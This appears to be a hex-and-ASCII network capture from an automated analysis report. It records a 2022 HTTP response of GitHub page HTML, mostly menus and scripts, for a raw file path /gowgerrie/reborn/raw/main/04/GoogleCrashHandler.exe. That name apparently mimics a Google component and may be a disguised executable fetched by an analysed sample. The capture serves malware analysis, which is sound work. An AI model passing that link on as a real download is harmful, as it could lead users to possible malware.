                                                                                              2022-08-10 04:48:02 UTC340INData Raw: 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 66 61 76 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 65 32 33 32 37 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                              Data Ascii: e="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"><meta name="theme-color" content="#1e2327"><meta name
                                                                                              2022-08-10 04:48:02 UTC341INData Raw: 32 33 31 61 39 38 35 32 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 43 65 6a 57 4e 31 77 2f 51 6a 62 4f 47 35 45 48 31 66 68 4e 79 50 6b 50 70 67 34 6e 49 6e 6e 70 72 54 41 4c 47 45 61 6f 78 39 45 6c 75 31 62 63 57 32 7a 45 6f 58 2b 66 45 4c 43 5a 41 42 52 65 34 2f 63 6d 76 2b 36 54 6e 61 2f 35 4f 49 70 78 73 58 64 36 2b 41 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 73 65 73
                                                                                              Data Ascii: 231a98525.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-CejWN1w/QjbOG5EH1fhNyPkPpg4nInnprTALGEaox9Elu1bcW2zEoX+fELCZABRe4/cmv+6Tna/5OIpxsXd6+A==" src="https://github.githubassets.com/assets/ses
                                                                                              2022-08-10 04:48:02 UTC342INData Raw: 20 30 20 31 2e 30 37 2d 2e 30 31 20 31 2e 39 33 2d 2e 30 31 20 32 2e 32 20 30 20 2e 32 31 2e 31 35 2e 34 36 2e 35 35 2e 33 38 41 38 2e 30 31 33 20 38 2e 30 31 33 20 30 20 30 30 31 36 20 38 63 30 2d 34 2e 34 32 2d 33 2e 35 38 2d 38 2d 38 2d 38 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 6c 67 2d 6e 6f 6e 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 20 77 69 64 74 68 2d 66 69 74 20 70 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63
                                                                                              Data Ascii: 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> </a> <div class="d-lg-none css-truncate css-truncate-target width-fit p-2"> </div> <div class="d-flex flex-items-c
                                                                                              2022-08-10 04:48:02 UTC344INData Raw: 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 74 68 72 65 65 2d 62 61 72 73 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 20 32 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 37 35 20 32 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 20 31 2e 35 48 31 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 20 32 2e 37 35 7a 6d 30 20 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 37 35 20 37 68 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 20 31 2e 35 48 31 2e 37 35 41 2e 37 35 2e 37 35 20 30 20 30 31 31 20 37 2e 37 35 7a 4d 31 2e 37 35 20 31 32 61 2e 37 35 2e 37 35 20 30 20 31 30 30 20 31 2e 35 68 31
                                                                                              Data Ascii: ew-component="true" class="octicon octicon-three-bars"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h1
                                                                                              2022-08-10 04:48:02 UTC345INData Raw: 65 6e 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 62 6f 72 64 65 72 2d 6c 67 2d 62 6f 74 74 6f 6d 2d 30 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 66 6c 65 78 20 66 6c 65 78 2d 6c 67 2d 6e 6f 77 72 61 70 20 66 6c 65 78 2d 6c 67 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 3c 64 65 74 61 69 6c 73 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 65 74 61 69 6c 73 20 64 65 74 61 69 6c 73 2d 6f 76 65 72 6c 61 79 20 64 65 74 61 69 6c 73 2d 72 65 73 65 74 20 77 69 64 74 68 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 3c 73 75 6d 6d 61 72 79 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 73 75 6d 6d 61 72 79 20 48 65 61 64 65 72 4d 65 6e 75 2d 6c 69 6e 6b 20 70 78 2d 30 20 70
                                                                                              Data Ascii: en flex-items-center border-bottom border-lg-bottom-0 d-block d-lg-flex flex-lg-nowrap flex-lg-items-center"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 p
                                                                                              2022-08-10 04:48:02 UTC346INData Raw: 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 20 70 6f 73 69 74 69 6f 6e 2d 6c 67 2d 72 65 6c 61 74 69 76 65 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 2c 31 6c 36 2e 32 2c 36 4c 31 33 2c 31 22 3e 3c 2f 70 61 74 68 3e 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 2f 73 75 6d 6d 61 72 79 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 66 6c 65 78 2d 61 75 74 6f 20 72 6f 75 6e 64 65 64 20 70 78 2d 30 20 6d 74 2d 30 20 70 62 2d 34 20 70 2d 6c 67 2d 34 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 6f 73 69 74 69 6f 6e 2d 6c 67 2d 61 62 73 6f 6c 75 74 65 20 6c 65 66 74 2d 30 20 6c 65 66 74 2d 6c 67 2d 6e 34 22 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 73 74 79
                                                                                              Data Ascii: position-absolute position-lg-relative"><path d="M1,1l6.2,6L13,1"></path></svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> <ul class="list-sty
                                                                                              2022-08-10 04:48:02 UTC347INData Raw: 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 41 63 74 69 6f 6e 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 41 63 74 69 6f 6e 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74
                                                                                              Data Ascii: ot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe;ref_cta:Actions;&quot;}" href="/features/actions"> Actions</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relat
                                                                                              2022-08-10 04:48:02 UTC348INData Raw: 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 50 61 63 6b 61 67 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 70 61 63 6b 61 67 65 73 22 3e 0a 20 20 20 20 20 20 50 61 63 6b 61 67 65 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61
                                                                                              Data Ascii: ler.exe;ref_cta:Packages;&quot;}" href="/features/packages"> Packages</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Hea
                                                                                              2022-08-10 04:48:02 UTC350INData Raw: 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74
                                                                                              Data Ascii: > </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go t
                                                                                              2022-08-10 04:48:02 UTC351INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 70 72 69 6d 61 72 79 20 74 65 78 74 2d 62 6f 6c 64 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 75 73 74
                                                                                              Data Ascii: <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--primary text-bold py-2" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to Cust
                                                                                              2022-08-10 04:48:02 UTC352INData Raw: 74 3b 48 65 61 64 65 72 20 6d 65 6e 75 20 74 6f 70 20 69 74 65 6d 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 6e 74 65 72 70 72 69 73 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 45 6e 74 65 72 70 72 69 73 65 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 65 6e 74 65 72 70 72 69 73 65 22 3e 45 6e 74 65 72 70 72 69 73 65 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 0a 0a
                                                                                              Data Ascii: t;Header menu top item (logged out)&quot;,&quot;action&quot;:&quot;click to go to Enterprise&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe;ref_cta:Enterprise;&quot;}" href="/enterprise">Enterprise</a></li>
                                                                                              2022-08-10 04:48:02 UTC354INData Raw: 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 45 78 70 6c 6f 72 65 20 47 69 74 48 75 62 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 65 78 70 6c 6f 72 65 22 3e 0a 20 20 20 20 20 20 45 78 70 6c 6f 72 65 20 47 69 74 48 75 62 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 74 65 78 74 2d 6e 6f 72 6d 61 6c 20 66 36 20 74 65 78 74 2d 6d 6f 6e 6f 20 6d 62 2d 31 20 62 6f 72 64 65 72 2d 74 6f 70 20 70 74 2d 33 20 6d 74 2d 33 20 6d 62 2d 31 22 3e 4c 65 61 72 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 65 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20
                                                                                              Data Ascii: n/04/GoogleCrashHandler.exe;ref_cta:Explore GitHub;&quot;}" href="/explore"> Explore GitHub</a> </li> <li class="color-fg-muted text-normal f6 text-mono mb-1 border-top pt-3 mt-3 mb-1">Learn and contribute</li> <li>
                                                                                              2022-08-10 04:48:02 UTC355INData Raw: 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 54 72 65 6e 64 69 6e 67 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 74 72 65 6e 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 54 72 65 6e 64 69 6e 67 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 70 79 2d 32 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63
                                                                                              Data Ascii: age:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe;ref_cta:Trending;&quot;}" href="/trending"> Trending</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-relative Link--secondary py-2" data-analytic
                                                                                              2022-08-10 04:48:02 UTC356INData Raw: 5f 63 74 61 3a 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 67 75 69 64 65 22 3e 0a 20 20 20 20 20 20 4f 70 65 6e 20 73 6f 75 72 63 65 20 67 75 69 64 65 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 74 65 78 74 2d 6e 6f 72 6d 61 6c 20 66 36 20 74 65 78 74 2d 6d 6f 6e 6f 20 6d 62 2d 31 20 62 6f 72 64 65 72 2d 74 6f 70 20 70 74 2d 33 20 6d 74 2d 33 20 6d 62 2d 31 22 3e 43 6f 6e 6e 65 63 74 20 77 69 74 68 20 6f 74 68 65 72 73 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c
                                                                                              Data Ascii: _cta:Open source guides;&quot;}" href="https://opensource.guide"> Open source guides</a> </li> <li class="color-fg-muted text-normal f6 text-mono mb-1 border-top pt-3 mt-3 mb-1">Connect with others</li> <li> <a cl
                                                                                              2022-08-10 04:48:02 UTC358INData Raw: 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 43 6f 6d 6d 75 6e 69 74 79 20 66 6f 72 75 6d 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 6d 75 6e 69 74 79 22 3e 0a 20 20 20 20 20 20 43 6f 6d 6d 75 6e 69 74 79 20 66 6f 72 75 6d 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d
                                                                                              Data Ascii: ot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe;ref_cta:Community forum;&quot;}" href="https://github.community"> Community forum</a> </li> <li> <a class="lh-condensed-ultra d-block no-underline position-
                                                                                              2022-08-10 04:48:02 UTC359INData Raw: 65 6e 75 2d 6c 69 6e 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 79 2d 33 20 64 2d 62 6c 6f 63 6b 20 64 2d 6c 67 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 6d 65 6e 75 20 74 6f 70 20 69 74 65 6d 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 4d 61 72 6b 65 74 70 6c 61 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61
                                                                                              Data Ascii: enu-link no-underline py-3 d-block d-lg-inline-block" data-analytics-event="{&quot;category&quot;:&quot;Header menu top item (logged out)&quot;,&quot;action&quot;:&quot;click to go to Marketplace&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/ra
                                                                                              2022-08-10 04:48:02 UTC360INData Raw: 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 50 6c 61 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 50 6c 61 6e 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 70 72 69 63 69 6e 67 22 3e 0a 20 20 20 20 20 20 50 6c 61 6e 73 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 2d 75 6c 74 72 61 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e
                                                                                              Data Ascii: quot;:&quot;click to go to Plans&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe;ref_cta:Plans;&quot;}" href="/pricing"> Plans</a> </li> <li> <a class="lh-condensed-ultra d-block no-un
                                                                                              2022-08-10 04:48:02 UTC362INData Raw: 20 74 6f 20 67 6f 20 74 6f 20 45 64 75 63 61 74 69 6f 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 67 6f 77 67 65 72 72 69 65 2f 72 65 62 6f 72 6e 2f 72 61 77 2f 6d 61 69 6e 2f 30 34 2f 47 6f 6f 67 6c 65 43 72 61 73 68 48 61 6e 64 6c 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 45 64 75 63 61 74 69 6f 6e 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 64 75 63 61 74 69 6f 6e 2e 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 45 64 75 63 61 74 69 6f 6e 0a 3c 2f 61 3e 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 65 74 61 69 6c 73 3e 0a 3c 2f 6c 69 3e 0a 0a 20
                                                                                              Data Ascii: to go to Education&quot;,&quot;label&quot;:&quot;ref_page:/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe;ref_cta:Education;&quot;}" href="https://education.github.com"> Education</a> </li> </ul> </div> </details></li>
                                                                                              2022-08-10 04:48:02 UTC363INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 68 6f 74 6b 65 79 3d 73 2c 2f 0a 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 71 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 74 65 73 74 2d 73 65 6c 65 63 74 6f 72 3d 22 6e 61 76 2d 73 65 61 72 63 68 2d 69 6e 70 75 74 22 0a 20 20 20 20 20 20 20 20 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 75 6e 73 63 6f 70 65 64 2d 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 20 47 69 74 48 75 62 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 73 63 6f 70 65 64 2d 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 20 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 0a 20 20 20 20
                                                                                              Data Ascii: data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off"
                                                                                              2022-08-10 04:48:02 UTC364INData Raw: 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 0a 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 73 74 61 72 74 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 2d 30 20 66 35 20 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 22 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 3e 0a 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e
                                                                                              Data Ascii: e js-jump-to-suggestions-template-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-cen
